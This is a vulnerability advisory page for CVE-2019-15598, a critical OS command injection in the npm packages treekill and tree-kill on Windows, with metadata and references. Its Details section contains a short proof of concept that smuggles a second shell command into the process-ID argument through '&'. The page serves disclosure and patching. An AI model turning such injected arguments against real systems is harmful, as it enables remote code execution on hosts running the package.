GHSA-j7fq-p9q7-5wfv
Suggest an improvement- Source
- https://github.com/advisories/GHSA-j7fq-p9q7-5wfv
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-j7fq-p9q7-5wfv/GHSA-j7fq-p9q7-5wfv.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-j7fq-p9q7-5wfv
- Aliases
-
- CVE-2019-15598
- Published
- 2022-05-24T17:04:00Z
- Modified
- 2024-04-22T23:44:02.289143Z
- Severity
-
- 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Treekill Enables OS Command Injection
- Details
-
A Code Injection exists in treekill and tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.
Steps To Reproduce:
Create the following PoC file:
var kill = require('treekill'); kill('3333332 & echo "HACKED" > HACKED.txt & ');Execute the following commands in terminal:
npm i treekill # Install affected module dir # Check *HACKED.txt* doesn't exist node poc.js # Run the PoC dir # Now *HACKED.txt* exists :)The HACKED.txt has been created
- Database specific
{ "nvd_published_at": "2019-12-18T21:15:00Z", "cwe_ids": [ "CWE-78" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-04-22T23:19:59Z" }- References
-
- https://nvd.nist.gov/vuln/detail/CVE-2019-15598
- https://github.com/pkrumins/node-tree-kill/issues/30
- https://github.com/pkrumins/node-tree-kill/pull/31
- https://github.com/pkrumins/node-tree-kill/commit/ff73dbf144c4c2daa67799a50dfff59cd455c63c
- https://hackerone.com/reports/701183
- https://hackerone.com/reports/703415
- https://github.com/node-modules/treekill/blob/master/index.js#L32
- https://github.com/pkrumins/node-tree-kill
- https://security.snyk.io/vuln/SNYK-JS-TREEKILL-536781
Affected packages
npm / tree-kill
Package
- Name
- tree-kill
- View open source insights on deps.dev
- Purl
- pkg:npm/tree-kill